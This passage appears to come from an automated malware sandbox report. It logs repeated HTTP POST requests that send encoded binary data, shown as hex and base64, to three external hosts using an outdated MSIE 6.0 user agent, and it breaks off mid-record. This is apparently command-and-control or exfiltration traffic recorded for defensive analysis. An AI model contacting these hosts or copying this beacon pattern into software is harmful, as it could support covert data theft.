34 32 46 69 46 62 76 50 4d 57 4f 7a 68 65 53 6d 79 4a 38 53 6d 2b 78 31 6f 4f 6f 58 38 69 38 4d 73 41 42 34 41 6f 2f 63 7a 61 4e 75 61 4d 73 6d 44 34 71 35 67 44 72 35 4d 34 58 58 49 76 35 4f 67 55 55 43 64 74 53 71 62 77 4f 68 5a 6a 39 56 70 4d 78 72 68 6e 44 75 49 61 54 4b 30 59 79 66 72 5a 55 79 73 6c 7a 71 41 67 47 64 74 38 69 58 39 31 50 4f 39 76 6e 45 70 30 35 57 6e 4f 38 31 72 41 37 4a 36 70 47 6a 64 53 43 6f 4e 69 74 47 64 59 76 56 57 53 48 30 50 38 6e 45 61 76 4c 50 35 38 4b 70 34 34 75 42 74 32 79 42 6c 46 63 73 4d 76 44 57 33 49 4a 42 37 49 64 76 75 53 38 39 4b 6f 31 35 51 73 41 73 32 6f 70 52 33 34 6d 46 68 34 63 50 75 63 45 50 72 4d 4d 55 62 72 6d 33 47 67 4b 7a 75 6c 36 63 70 4a 6f 39 45 33 51 70 4a 64 55 44 35 6a 48 77 63 77 70 6a 6d 59 73 4a 6f Data Ascii: ejw03p5VPRHfsvRo6UAX6YF0IqDen+WrssemzASwgFKZR4ZCAEXM17nh/uxTEL1G4QIQj+oGxJbNSIju3lCZoLtUVmr532/VAKs5s40/G0XgBfmclGAjo3Zw2wabUuYW0MhYaH2YF5yLK1Vuyb/QQdGdHAz9PNdvfVau2127a7J3geN3FCk6gM0qiTIV/cLVGkRAs6OVGEHZXy+uy3WeeV8SzfsniFeY1qmEWKm50mWrM9BboFIDqFiONrdGQ4/pc16oHwcyhJymLeE42FiFbvPMWOzheSmyJ8Sm+x1oOoX8i8MsAB4Ao/czaNuaMsmD4q5gDr5M4XXIv5OgUUCdtSqbwOhZj9VpMxrhnDuIaTK0YyfrZUyslzqAgGdt8iX91PO9vnEp05WnO81rA7J6pGjdSCoNitGdYvVWSH0P8nEavLP58Kp44uBt2yBlFcsMvDW3IJB7IdvuS89Ko15QsAs2opR34mFh4cPucEPrMMUbrm3GgKzul6cpJo9E3QpJdUD5jHwcwpjmYsJo
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 6e 74 53 6b 42 73 6d 6c 50 68 48 77 6b 63 2b 78 47 48 52 4d 51 2b 4c 55 4e 34 44 6e 4a 67 37 37 44 54 30 4f 5a 50 6f 4a 58 4b 77 46 30 6d 66 31 32 4b 56 2b 44 63 74 79 2f 55 72 56 4f 32 4a 79 54 44 34 64 73 74 73 73 38 4b 59 63 35 65 30 69 56 66 67 31 41 6a 34 37 77 30 36 2f 2f 63 4b 47 41 59 4c 6d 75 39 4a 54 6f 38 74 59 76 63 78 64 62 43 39 38 73 6f 6c 74 53 30 50 4d 4e 46 33 46 55 76 4d 37 39 55 6e 42 67 4d 79 67 42 71 4f 6f 75 2f 45 79 33 54 74 47 69 61 6e 6c 33 6a 79 38 7a 36 37 56 68 51 4c 2b 31 6a 59 75 4f 37 74 4c 36 61 54 54 52 53 52 54 2b 64 58 42 71 41 34 62 35 78 41 56 6d 77 71 4f 66 61 53 43 7a 6d 72 72 68 30 76 44 71 33 6c 49 41 37 75 67 63 47 64 6a 35 51 6a 72 7a 35 48 70 34 48 6a 6a 49 37 51 39 69 4c 7a 62 6f 73 4e 41 4b 35 73 77 64 64 48 76 68 6f 31 33 6c 36 34 4d 34 4a 44 37 68 63 72 66 50 35 75 4b 65 68 4b 45 33 38 6a 6f 35 73 71 79 4d 53 71 48 39 69 75 47 49 32 70 62 46 39 50 57 59 4c 44 50 75 6b 4a 74 56 33 4e 66 4c 63 36 65 58 54 70 44 7a 65 6c 63 4e 4a 6b 73 64 45 64 4f 6b 71 49 44 4e 5a 49 4d 41 4b 6c 50 36 70 39 45 6e 79 79 6c 48 59 2b 43 72 6c 4f 4a 6f 62 32 72 4e 7a 2f 59 6e 41 47 74 55 56 6d 46 42 74 65 6d 31 6d 74 69 31 43 41 62 4b 4c 36 39 4a 76 33 47 7a 46 66 4d 54 34 43 5a 47 42 49 71 46 75 63 71 64 4d 4e 78 62 56 50 6f 73 36 4c 35 42 34 4b 36 78 68 30 6f 59 75 74 51 73 4e 6c 71 6f 61 41 38 72 49 4f 79 4d 63 4f 69 53 52 6b 53 79 4f 63 6a 6f 59 41 4a 6b 32 4e 79 39 67 71 36 4c 4b 30 52 75 78 6a 4c 4a 43 58 72 4e 72 64 36 73 5a 33 68 35 52 64 71 31 4b 79 49 35 47 71 4f 6d 56 6a 71 69 79 58 34 2f 61 6f 61 77 30 6b 51 59 6b 47 75 51 56 55 6a 6d 53 71 6a 53 64 48 62 Data Ascii: ntSkBsmlPhHwkc+xGHRMQ+LUN4DnJg77DT0OZPoJXKwF0mf12KV+Dcty/UrVO2JyTD4dstss8KYc5e0iVfg1Aj47w06//cKGAYLmu9JTo8tYvcxdbC98soltS0PMNF3FUvM79UnBgMygBqOou/Ey3TtGianl3jy8z67VhQL+1jYuO7tL6aTTRSRT+dXBqA4b5xAVmwqOfaSCzmrrh0vDq3lIA7ugcGdj5Qjrz5Hp4HjjI7Q9iLzbosNAK5swddHvho13l64M4JD7hcrfP5uKehKE38jo5sqyMSqH9iuGI2pbF9PWYLDPukJtV3NfLc6eXTpDzelcNJksdEdOkqIDNZIMAKlP6p9EnyylHY+CrlOJob2rNz/YnAGtUVmFBtem1mti1CAbKL69Jv3GzFfMT4CZGBIqFucqdMNxbVPos6L5B4K6xh0oYutQsNlqoaA8rIOyMcOiSRkSyOcjoYAJk2Ny9gq6LK0RuxjLJCXrNrd6sZ3h5Rdq1KyI5GqOmVjqiyX4/aoaw0kQYkGuQVUjmSqjSdHb
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 6e 74 53 6b 42 73 6d 6c 50 68 48 77 6b 63 2b 78 47 48 52 4d 51 2b 4c 55 4e 34 44 6e 4a 67 37 37 44 54 30 4f 5a 50 6f 4a 58 4b 77 46 30 6d 66 31 32 4b 56 2b 44 63 74 79 2f 55 72 56 4f 32 4a 79 54 44 34 64 73 74 73 73 38 4b 59 63 35 65 30 69 56 66 67 31 41 6a 34 37 77 30 36 2f 2f 63 4b 47 41 59 4c 6d 75 39 4a 54 6f 38 74 59 76 63 78 64 62 43 39 38 73 6f 6c 74 53 30 50 4d 4e 46 33 46 55 76 4d 37 39 55 6e 42 67 4d 79 67 42 71 4f 6f 75 2f 45 79 33 54 74 47 69 61 6e 6c 33 6a 79 38 7a 36 37 56 68 51 4c 2b 31 6a 59 75 4f 37 74 4c 36 61 54 54 52 53 52 54 2b 64 58 42 71 41 34 62 35 78 41 56 6d 77 71 4f 66 61 53 43 7a 6d 72 72 68 30 76 44 71 33 6c 49 41 37 75 67 63 47 64 6a 35 51 6a 72 7a 35 48 70 34 48 6a 6a 49 37 51 39 69 4c 7a 62 6f 73 4e 41 4b 35 73 77 64 64 48 76 68 6f 31 33 6c 36 34 4d 34 4a 44 37 68 63 72 66 50 35 75 4b 65 68 4b 45 33 38 6a 6f 35 73 71 79 4d 53 71 48 39 69 75 47 49 32 70 62 46 39 50 57 59 4c 44 50 75 6b 4a 74 56 33 4e 66 4c 63 36 65 58 54 70 44 7a 65 6c 63 4e 4a 6b 73 64 45 64 4f 6b 71 49 44 4e 5a 49 4d 41 4b 6c 50 36 70 39 45 6e 79 79 6c 48 59 2b 43 72 6c 4f 4a 6f 62 32 72 4e 7a 2f 59 6e 41 47 74 55 56 6d 46 42 74 65 6d 31 6d 74 69 31 43 41 62 4b 4c 36 39 4a 76 33 47 7a 46 66 4d 54 34 43 5a 47 42 49 71 46 75 63 71 64 4d 4e 78 62 56 50 6f 73 36 4c 35 42 34 4b 36 78 68 30 6f 59 75 74 51 73 4e 6c 71 6f 61 41 38 72 49 4f 79 4d 63 4f 69 53 52 6b 53 79 4f 63 6a 6f 59 41 4a 6b 32 4e 79 39 67 71 36 4c 4b 30 52 75 78 6a 4c 4a 43 58 72 4e 72 64 36 73 5a 33 68 35 52 64 71 31 4b 79 49 35 47 71 4f 6d 56 6a 71 69 79 58 34 2f 61 6f 61 77 30 6b 51 59 6b 47 75 51 56 55 6a 6d 53 71 6a 53 64 48 62 Data Ascii: ntSkBsmlPhHwkc+xGHRMQ+LUN4DnJg77DT0OZPoJXKwF0mf12KV+Dcty/UrVO2JyTD4dstss8KYc5e0iVfg1Aj47w06//cKGAYLmu9JTo8tYvcxdbC98soltS0PMNF3FUvM79UnBgMygBqOou/Ey3TtGianl3jy8z67VhQL+1jYuO7tL6aTTRSRT+dXBqA4b5xAVmwqOfaSCzmrrh0vDq3lIA7ugcGdj5Qjrz5Hp4HjjI7Q9iLzbosNAK5swddHvho13l64M4JD7hcrfP5uKehKE38jo5sqyMSqH9iuGI2pbF9PWYLDPukJtV3NfLc6eXTpDzelcNJksdEdOkqIDNZIMAKlP6p9EnyylHY+CrlOJob2rNz/YnAGtUVmFBtem1mti1CAbKL69Jv3GzFfMT4CZGBIqFucqdMNxbVPos6L5B4K6xh0oYutQsNlqoaA8rIOyMcOiSRkSyOcjoYAJk2Ny9gq6LK0RuxjLJCXrNrd6sZ3h5Rdq1KyI5GqOmVjqiyX4/aoaw0kQYkGuQVUjmSqjSdHb
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 5a 59 42 45 47 77 76 41 46 52 48 7a 4a 6a 57 45 59 68 55 68 68 6e 54 6d 46 31 39 52 51 78 6e 6c 62 36 4c 49 49 44 66 59 70 54 46 68 55 49 47 78 50 78 55 41 70 47 41 6b 38 62 34 67 61 78 2b 79 70 39 6a 4c 36 4e 42 75 4b 7a 63 54 4d 6c 76 6b 66 79 52 38 31 59 64 4f 65 32 6f 6d 63 32 4a 53 38 6e 79 6c 59 6d 46 2f 5a 2f 36 72 36 35 2b 4c 44 76 66 69 56 45 76 58 31 55 57 4c 74 4e 38 73 44 52 36 38 4e 74 51 74 68 6c 35 74 7a 43 6d 32 7a 65 2b 55 47 64 72 44 32 4d 4a 53 53 54 69 56 35 4e 41 4d 47 45 56 71 2b 78 6a 5a 72 5a 4b 45 4f 31 78 64 49 4b 4d 73 77 51 67 53 30 4f 79 73 6b 44 38 34 6e 38 64 69 6b 72 74 33 37 57 35 55 44 70 4a 62 59 52 68 62 7a 4c 4d 62 5a 45 2b 56 37 76 50 4d 36 6b 62 30 68 37 46 36 41 5a 32 7a 45 31 42 30 30 6c 77 4c 47 76 50 72 59 2f 4e 46 6a 32 70 51 35 32 32 37 4d 78 5a 7a 44 49 2b 42 5a 69 64 6a 33 32 62 2b 37 6b 4d 7a 55 55 76 78 74 5a 74 57 59 43 6c 52 46 43 6f 42 35 74 65 73 56 43 63 63 75 73 30 50 63 78 70 68 4a 58 73 4a 74 4f 6e 2f 54 76 79 38 35 42 50 32 6e 75 38 6a 39 69 70 36 58 6a 59 58 72 51 4b 64 47 63 56 58 48 7a 2b 6e 6b 65 49 59 54 5a 6b 39 52 62 39 33 46 51 57 59 62 72 65 67 58 68 68 77 2b 72 62 72 66 33 6b 70 32 2f 6e 69 35 59 52 31 66 72 49 71 6a 7a 52 41 69 56 73 46 4c 6c 58 67 6e 4c 79 52 6b 53 47 6c 4e 72 4f 34 2b 34 4d 4c 70 61 68 53 74 79 44 38 49 79 77 6a 44 32 41 41 43 43 71 36 34 56 72 63 50 78 38 73 31 33 54 41 35 74 5a 37 36 74 47 77 54 6d 6f 6c 38 35 76 44 4e 44 4c 36 64 49 49 69 41 52 39 36 6e 33 34 4b 62 30 76 74 72 51 49 4f 6a 6d 49 31 75 7a 63 38 62 37 74 67 32 6b 2b 66 75 71 75 46 4d 35 43 5a 51 38 6a 4a 4a 7a 56 61 33 54 59 46 Data Ascii: ZYBEGwvAFRHzJjWEYhUhhnTmF19RQxnlb6LIIDfYpTFhUIGxPxUApGAk8b4gax+yp9jL6NBuKzcTMlvkfyR81YdOe2omc2JS8nylYmF/Z/6r65+LDvfiVEvX1UWLtN8sDR68NtQthl5tzCm2ze+UGdrD2MJSSTiV5NAMGEVq+xjZrZKEO1xdIKMswQgS0OyskD84n8dikrt37W5UDpJbYRhbzLMbZE+V7vPM6kb0h7F6AZ2zE1B00lwLGvPrY/NFj2pQ5227MxZzDI+BZidj32b+7kMzUUvxtZtWYClRFCoB5tesVCccus0PcxphJXsJtOn/Tvy85BP2nu8j9ip6XjYXrQKdGcVXHz+nkeIYTZk9Rb93FQWYbregXhhw+rbrf3kp2/ni5YR1frIqjzRAiVsFLlXgnLyRkSGlNrO4+4MLpahStyD8IywjD2AACCq64VrcPx8s13TA5tZ76tGwTmol85vDNDL6dIIiAR96n34Kb0vtrQIOjmI1uzc8b7tg2k+fuquFM5CZQ8jJJzVa3TYF
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 6e 74 53 6b 42 73 6d 6c 50 68 48 77 6b 63 2b 78 47 48 52 4d 51 2b 4c 55 4e 34 44 6e 4a 67 37 37 44 54 30 4f 5a 50 6f 4a 58 4b 77 46 30 6d 66 31 32 4b 56 2b 44 63 74 79 2f 55 72 56 4f 32 4a 79 54 44 34 64 73 74 73 73 38 4b 59 63 35 65 30 69 56 66 67 31 41 6a 34 37 77 30 36 2f 2f 63 4b 47 41 59 4c 6d 75 39 4a 54 6f 38 74 59 76 63 78 64 62 43 39 38 73 6f 6c 74 53 30 50 4d 4e 46 33 46 55 76 4d 37 39 55 6e 42 67 4d 79 67 42 71 4f 6f 75 2f 45 79 33 54 74 47 69 61 6e 6c 33 6a 79 38 7a 36 37 56 68 51 4c 2b 31 6a 59 75 4f 37 74 4c 36 61 54 54 52 53 52 54 2b 64 58 42 71 41 34 62 35 78 41 56 6d 77 71 4f 66 61 53 43 7a 6d 72 72 68 30 76 44 71 33 6c 49 41 37 75 67 63 47 64 6a 35 51 6a 72 7a 35 48 70 34 48 6a 6a 49 37 51 39 69 4c 7a 62 6f 73 4e 41 4b 35 73 77 64 64 48 76 68 6f 31 33 6c 36 34 4d 34 4a 44 37 68 63 72 66 50 35 75 4b 65 68 4b 45 33 38 6a 6f 35 73 71 79 4d 53 71 48 39 69 75 47 49 32 70 62 46 39 50 57 59 4c 44 50 75 6b 4a 74 56 33 4e 66 4c 63 36 65 58 54 70 44 7a 65 6c 63 4e 4a 6b 73 64 45 64 4f 6b 71 49 44 4e 5a 49 4d 41 4b 6c 50 36 70 39 45 6e 79 79 6c 48 59 2b 43 72 6c 4f 4a 6f 62 32 72 4e 7a 2f 59 6e 41 47 74 55 56 6d 46 42 74 65 6d 31 6d 74 69 31 43 41 62 4b 4c 36 39 4a 76 33 47 7a 46 66 4d 54 34 43 5a 47 42 49 71 46 75 63 71 64 4d 4e 78 62 56 50 6f 73 36 4c 35 42 34 4b 36 78 68 30 6f 59 75 74 51 73 4e 6c 71 6f 61 41 38 72 49 4f 79 4d 63 4f 69 53 52 6b 53 79 4f 63 6a 6f 59 41 4a 6b 32 4e 79 39 67 71 36 4c 4b 30 52 75 78 6a 4c 4a 43 58 72 4e 72 64 36 73 5a 33 68 35 52 64 71 31 4b 79 49 35 47 71 4f 6d 56 6a 71 69 79 58 34 2f 61 6f 61 77 30 6b 51 59 6b 47 75 51 56 55 6a 6d 53 71 6a 53 64 48 62 Data Ascii: ntSkBsmlPhHwkc+xGHRMQ+LUN4DnJg77DT0OZPoJXKwF0mf12KV+Dcty/UrVO2JyTD4dstss8KYc5e0iVfg1Aj47w06//cKGAYLmu9JTo8tYvcxdbC98soltS0PMNF3FUvM79UnBgMygBqOou/Ey3TtGianl3jy8z67VhQL+1jYuO7tL6aTTRSRT+dXBqA4b5xAVmwqOfaSCzmrrh0vDq3lIA7ugcGdj5Qjrz5Hp4HjjI7Q9iLzbosNAK5swddHvho13l64M4JD7hcrfP5uKehKE38jo5sqyMSqH9iuGI2pbF9PWYLDPukJtV3NfLc6eXTpDzelcNJksdEdOkqIDNZIMAKlP6p9EnyylHY+CrlOJob2rNz/YnAGtUVmFBtem1mti1CAbKL69Jv3GzFfMT4CZGBIqFucqdMNxbVPos6L5B4K6xh0oYutQsNlqoaA8rIOyMcOiSRkSyOcjoYAJk2Ny9gq6LK0RuxjLJCXrNrd6sZ3h5Rdq1KyI5GqOmVjqiyX4/aoaw0kQYkGuQVUjmSqjSdHb
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 6e 74 53 6b 42 73 6d 6c 50 68 48 77 6b 63 2b 78 47 48 52 4d 51 2b 4c 55 4e 34 44 6e 4a 67 37 37 44 54 30 4f 5a 50 6f 4a 58 4b 77 46 30 6d 66 31 32 4b 56 2b 44 63 74 79 2f 55 72 56 4f 32 4a 79 54 44 34 64 73 74 73 73 38 4b 59 63 35 65 30 69 56 66 67 31 41 6a 34 37 77 30 36 2f 2f 63 4b 47 41 59 4c 6d 75 39 4a 54 6f 38 74 59 76 63 78 64 62 43 39 38 73 6f 6c 74 53 30 50 4d 4e 46 33 46 55 76 4d 37 39 55 6e 42 67 4d 79 67 42 71 4f 6f 75 2f 45 79 33 54 74 47 69 61 6e 6c 33 6a 79 38 7a 36 37 56 68 51 4c 2b 31 6a 59 75 4f 37 74 4c 36 61 54 54 52 53 52 54 2b 64 58 42 71 41 34 62 35 78 41 56 6d 77 71 4f 66 61 53 43 7a 6d 72 72 68 30 76 44 71 33 6c 49 41 37 75 67 63 47 64 6a 35 51 6a 72 7a 35 48 70 34 48 6a 6a 49 37 51 39 69 4c 7a 62 6f 73 4e 41 4b 35 73 77 64 64 48 76 68 6f 31 33 6c 36 34 4d 34 4a 44 37 68 63 72 66 50 35 75 4b 65 68 4b 45 33 38 6a 6f 35 73 71 79 4d 53 71 48 39 69 75 47 49 32 70 62 46 39 50 57 59 4c 44 50 75 6b 4a 74 56 33 4e 66 4c 63 36 65 58 54 70 44 7a 65 6c 63 4e 4a 6b 73 64 45 64 4f 6b 71 49 44 4e 5a 49 4d 41 4b 6c 50 36 70 39 45 6e 79 79 6c 48 59 2b 43 72 6c 4f 4a 6f 62 32 72 4e 7a 2f 59 6e 41 47 74 55 56 6d 46 42 74 65 6d 31 6d 74 69 31 43 41 62 4b 4c 36 39 4a 76 33 47 7a 46 66 4d 54 34 43 5a 47 42 49 71 46 75 63 71 64 4d 4e 78 62 56 50 6f 73 36 4c 35 42 34 4b 36 78 68 30 6f 59 75 74 51 73 4e 6c 71 6f 61 41 38 72 49 4f 79 4d 63 4f 69 53 52 6b 53 79 4f 63 6a 6f 59 41 4a 6b 32 4e 79 39 67 71 36 4c 4b 30 52 75 78 6a 4c 4a 43 58 72 4e 72 64 36 73 5a 33 68 35 52 64 71 31 4b 79 49 35 47 71 4f 6d 56 6a 71 69 79 58 34 2f 61 6f 61 77 30 6b 51 59 6b 47 75 51 56 55 6a 6d 53 71 6a 53 64 48 62 Data Ascii: ntSkBsmlPhHwkc+xGHRMQ+LUN4DnJg77DT0OZPoJXKwF0mf12KV+Dcty/UrVO2JyTD4dstss8KYc5e0iVfg1Aj47w06//cKGAYLmu9JTo8tYvcxdbC98soltS0PMNF3FUvM79UnBgMygBqOou/Ey3TtGianl3jy8z67VhQL+1jYuO7tL6aTTRSRT+dXBqA4b5xAVmwqOfaSCzmrrh0vDq3lIA7ugcGdj5Qjrz5Hp4HjjI7Q9iLzbosNAK5swddHvho13l64M4JD7hcrfP5uKehKE38jo5sqyMSqH9iuGI2pbF9PWYLDPukJtV3NfLc6eXTpDzelcNJksdEdOkqIDNZIMAKlP6p9EnyylHY+CrlOJob2rNz/YnAGtUVmFBtem1mti1CAbKL69Jv3GzFfMT4CZGBIqFucqdMNxbVPos6L5B4K6xh0oYutQsNlqoaA8rIOyMcOiSRkSyOcjoYAJk2Ny9gq6LK0RuxjLJCXrNrd6sZ3h5Rdq1KyI5GqOmVjqiyX4/aoaw0kQYkGuQVUjmSqjSdHb
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 6e 74 53 6b 42 73 6d 6c 50 68 48 77 6b 63 2b 78 47 48 52 4d 51 2b 4c 55 4e 34 44 6e 4a 67 37 37 44 54 30 4f 5a 50 6f 4a 58 4b 77 46 30 6d 66 31 32 4b 56 2b 44 63 74 79 2f 55 72 56 4f 32 4a 79 54 44 34 64 73 74 73 73 38 4b 59 63 35 65 30 69 56 66 67 31 41 6a 34 37 77 30 36 2f 2f 63 4b 47 41 59 4c 6d 75 39 4a 54 6f 38 74 59 76 63 78 64 62 43 39 38 73 6f 6c 74 53 30 50 4d 4e 46 33 46 55 76 4d 37 39 55 6e 42 67 4d 79 67 42 71 4f 6f 75 2f 45 79 33 54 74 47 69 61 6e 6c 33 6a 79 38 7a 36 37 56 68 51 4c 2b 31 6a 59 75 4f 37 74 4c 36 61 54 54 52 53 52 54 2b 64 58 42 71 41 34 62 35 78 41 56 6d 77 71 4f 66 61 53 43 7a 6d 72 72 68 30 76 44 71 33 6c 49 41 37 75 67 63 47 64 6a 35 51 6a 72 7a 35 48 70 34 48 6a 6a 49 37 51 39 69 4c 7a 62 6f 73 4e 41 4b 35 73 77 64 64 48 76 68 6f 31 33 6c 36 34 4d 34 4a 44 37 68 63 72 66 50 35 75 4b 65 68 4b 45 33 38 6a 6f 35 73 71 79 4d 53 71 48 39 69 75 47 49 32 70 62 46 39 50 57 59 4c 44 50 75 6b 4a 74 56 33 4e 66 4c 63 36 65 58 54 70 44 7a 65 6c 63 4e 4a 6b 73 64 45 64 4f 6b 71 49 44 4e 5a 49 4d 41 4b 6c 50 36 70 39 45 6e 79 79 6c 48 59 2b 43 72 6c 4f 4a 6f 62 32 72 4e 7a 2f 59 6e 41 47 74 55 56 6d 46 42 74 65 6d 31 6d 74 69 31 43 41 62 4b 4c 36 39 4a 76 33 47 7a 46 66 4d 54 34 43 5a 47 42 49 71 46 75 63 71 64 4d 4e 78 62 56 50 6f 73 36 4c 35 42 34 4b 36 78 68 30 6f 59 75 74 51 73 4e 6c 71 6f 61 41 38 72 49 4f 79 4d 63 4f 69 53 52 6b 53 79 4f 63 6a 6f 59 41 4a 6b 32 4e 79 39 67 71 36 4c 4b 30 52 75 78 6a 4c 4a 43 58 72 4e 72 64 36 73 5a 33 68 35 52 64 71 31 4b 79 49 35 47 71 4f 6d 56 6a 71 69 79 58 34 2f 61 6f 61 77 30 6b 51 59 6b 47 75 51 56 55 6a 6d 53 71 6a 53 64 48 62 Data Ascii: ntSkBsmlPhHwkc+xGHRMQ+LUN4DnJg77DT0OZPoJXKwF0mf12KV+Dcty/UrVO2JyTD4dstss8KYc5e0iVfg1Aj47w06//cKGAYLmu9JTo8tYvcxdbC98soltS0PMNF3FUvM79UnBgMygBqOou/Ey3TtGianl3jy8z67VhQL+1jYuO7tL6aTTRSRT+dXBqA4b5xAVmwqOfaSCzmrrh0vDq3lIA7ugcGdj5Qjrz5Hp4HjjI7Q9iLzbosNAK5swddHvho13l64M4JD7hcrfP5uKehKE38jo5sqyMSqH9iuGI2pbF9PWYLDPukJtV3NfLc6eXTpDzelcNJksdEdOkqIDNZIMAKlP6p9EnyylHY+CrlOJob2rNz/YnAGtUVmFBtem1mti1CAbKL69Jv3GzFfMT4CZGBIqFucqdMNxbVPos6L5B4K6xh0oYutQsNlqoaA8rIOyMcOiSRkSyOcjoYAJk2Ny9gq6LK0RuxjLJCXrNrd6sZ3h5Rdq1KyI5GqOmVjqiyX4/aoaw0kQYkGuQVUjmSqjSdHb
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 6b 70 34 75 67 79 4f 78 51 68 46 61 69 78 59 6b 71 75 54 51 2b 30 79 76 70 34 68 4a 42 6f 54 6f 42 35 6b 68 6c 42 53 77 7a 2f 44 39 32 41 2b 5a 6f 66 63 69 5a 61 2f 2b 30 53 48 42 41 47 6d 76 4a 37 45 4f 32 57 66 41 6b 4e 2f 45 46 6f 35 62 37 62 39 42 69 76 56 34 42 42 61 63 38 33 6c 7a 57 4c 48 68 4d 43 32 49 68 71 72 73 6a 75 47 4f 7a 49 56 30 43 44 75 48 42 45 7a 4a 64 69 33 49 45 7a 6b 4e 37 6f 44 6f 39 7a 62 36 37 59 44 5a 4f 36 32 6c 7a 6e 6c 6b 44 2b 39 2b 62 34 6b 7a 56 42 55 50 62 39 4c 4f 2b 2b 30 4c 54 73 39 37 6b 77 77 37 76 6b 62 55 69 65 49 36 48 2b 61 30 43 4e 45 6c 44 64 2b 59 69 43 54 6c 64 64 59 55 6d 51 35 66 4b 44 2f 67 57 41 48 79 75 5a 4b 71 43 67 37 46 44 47 36 2f 6a 57 73 46 77 30 54 73 34 71 74 6a 5a 76 4b 75 58 59 74 6b 63 36 48 47 42 6e 6f 6b 44 6a 76 76 79 5a 4b 4c 45 4b 65 73 58 43 76 64 31 4e 78 34 2b 79 48 54 78 6f 38 79 63 46 38 51 6b 44 44 51 74 79 33 6f 6a 6e 38 65 61 2f 2f 4e 31 36 37 6d 74 61 32 43 4c 47 77 6f 79 46 57 2b 6e 50 67 79 74 54 59 78 32 53 32 51 67 4b 70 66 33 61 4d 4a 51 44 4c 4f 74 6f 57 43 4b 55 66 58 68 63 45 56 64 50 4a 52 76 45 35 4c 52 6b 51 36 4e 33 34 76 56 79 2b 44 4c 70 6f 50 54 6b 57 51 62 43 7a 66 6a 36 75 4b 4f 4e 57 71 44 61 43 63 58 61 50 72 64 59 48 6e 38 37 77 51 37 69 41 6c 34 34 4b 52 50 2b 61 73 69 5a 54 43 56 41 6a 76 37 2f 76 68 72 50 53 67 74 41 48 4e 79 34 54 41 67 62 6a 41 57 4b 43 36 5a 64 4d 58 42 44 52 56 78 37 64 48 6f 4c 64 62 48 6c 65 46 78 2b 46 53 4f 52 33 33 51 49 75 75 79 7a 6d 78 6a 71 63 69 44 6e 4e 6f 43 47 77 76 4c 70 44 6e 58 32 58 54 46 54 62 43 72 51 33 34 78 4c 71 33 31 7a 6e 37 6d 6a 42 54 4b 2f 54 50 76 65 33 50 7a 45 32 30 58 68 70 34 4d 68 4c 62 72 6a 75 41 Data Ascii: kp4ugyOxQhFaixYkquTQ+0yvp4hJBoToB5khlBSwz/D92A+ZofciZa/+0SHBAGmvJ7EO2WfAkN/EFo5b7b9BivV4BBac83lzWLHhMC2IhqrsjuGOzIV0CDuHBEzJdi3IEzkN7oDo9zb67YDZO62lznlkD+9+b4kzVBUPb9LO++0LTs97kww7vkbUieI6H+a0CNElDd+YiCTlddYUmQ5fKD/gWAHyuZKqCg7FDG6/jWsFw0Ts4qtjZvKuXYtkc6HGBnokDjvvyZKLEKesXCvd1Nx4+yHTxo8ycF8QkDDQty3ojn8ea//N167mta2CLGwoyFW+nPgytTYx2S2QgKpf3aMJQDLOtoWCKUfXhcEVdPJRvE5LRkQ6N34vVy+DLpoPTkWQbCzfj6uKONWqDaCcXaPrdYHn87wQ7iAl44KRP+asiZTCVAjv7/vhrPSgtAHNy4TAgbjAWKC6ZdMXBDRVx7dHoLdbHleFx+FSOR33QIuuyzmxjqciDnNoCGwvLpDnX2XTFTbCrQ34xLq31zn7mjBTK/TPve3PzE20Xhp4MhLbrjuA
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 5a 59 42 45 47 77 76 41 46 52 48 7a 4a 6a 57 45 59 68 55 68 68 6e 54 6d 46 31 39 52 51 78 6e 6c 62 36 4c 49 49 44 66 59 70 54 46 68 55 49 47 78 50 78 55 41 70 47 41 6b 38 62 34 67 61 78 2b 79 70 39 6a 4c 36 4e 42 75 4b 7a 63 54 4d 6c 76 6b 66 79 52 38 31 59 64 4f 65 32 6f 6d 63 32 4a 53 38 6e 79 6c 59 6d 46 2f 5a 2f 36 72 36 35 2b 4c 44 76 66 69 56 45 76 58 31 55 57 4c 74 4e 38 73 44 52 36 38 4e 74 51 74 68 6c 35 74 7a 43 6d 32 7a 65 2b 55 47 64 72 44 32 4d 4a 53 53 54 69 56 35 4e 41 4d 47 45 56 71 2b 78 6a 5a 72 5a 4b 45 4f 31 78 64 49 4b 4d 73 77 51 67 53 30 4f 79 73 6b 44 38 34 6e 38 64 69 6b 72 74 33 37 57 35 55 44 70 4a 62 59 52 68 62 7a 4c 4d 62 